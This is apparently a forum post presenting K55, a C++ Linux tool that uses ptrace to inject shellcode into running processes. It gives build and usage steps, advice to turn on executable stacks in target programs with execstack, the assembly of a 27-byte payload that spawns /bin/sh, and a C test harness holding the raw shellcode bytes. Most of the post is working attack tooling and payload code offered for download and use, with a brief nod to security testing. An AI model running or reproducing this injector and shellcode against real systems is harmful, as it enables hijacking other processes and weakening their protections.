Serafim

Advanced
Joined
28.09.20
Messages
130
Reaction score
1,196
Points
93

K55 - Linux x86_64 Process Injection Utility (C++11)​


About K55​

(pronounced: "kay fifty-five")
The K55 payload injection tool is used for injecting x86_64 shellcode payloads into running processes. The utility was developed using modern C++11 techniques as well as some traditional C linux functions like ptrace(). The shellcode spawned in the target process is 27 bytes and it executes /bin/sh (spawns a bash shell) within the target's address space. In the future, I will allow users to input there own shellcode via command line arguments.

Installation​

  1. git clone josh0xA/K55
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 Usage​

Usage: ./K55 <process-name>

  • process-name can be any linux process with r-xp or execstack permissions.

Tests​

Test 1) In one terminal (K55/ Directory), run: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector: ./K55 k55_test_process

K55 In Action​

  • A shell is spawned in k55_test_process when the K55 shellcode injector is ran (as root).

Injecting Into Given Process​


Shell Spawned In Target​


Limitations​

Obviously, ptrace(PTRACE_POKETEXT...) calls are not the most disguised. So, some applications can limit the effect of K55. Although, for security testing, make sure to turn on execstack for your target applications. For example if I'm testing on gdb, before I would inject, I would run the following: sudo execstack -s /usr/bin/gdb. Install execstack from your distrobutions package manager. For Arch Linux users, you can find execstack on the AUR.

Crafting The Shell Payload​

Note: The following is a demonstration. The payload string is already hardcoded into K55.

Assembly Implementation of The Payload (Cited from shell-storm (redirect))​

main:
xor eax, eax
mov rbx, 0xFF978CD091969DD1
neg rbx
push rbx
push rsp
pop rdi
cdq
push rdx
push rdi
push rsp
pop rsi
mov al, 0x3b
syscall

C-Implementation of The Payload​

#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
printf("len:%d bytes\n", strlen(code));
((void()()) code)();
return 0;
}

References​

Linux/x86-64 - Execute /bin/sh - 27 bytes
[Linux] Infecting Running Processes

Download
 
Top Bottom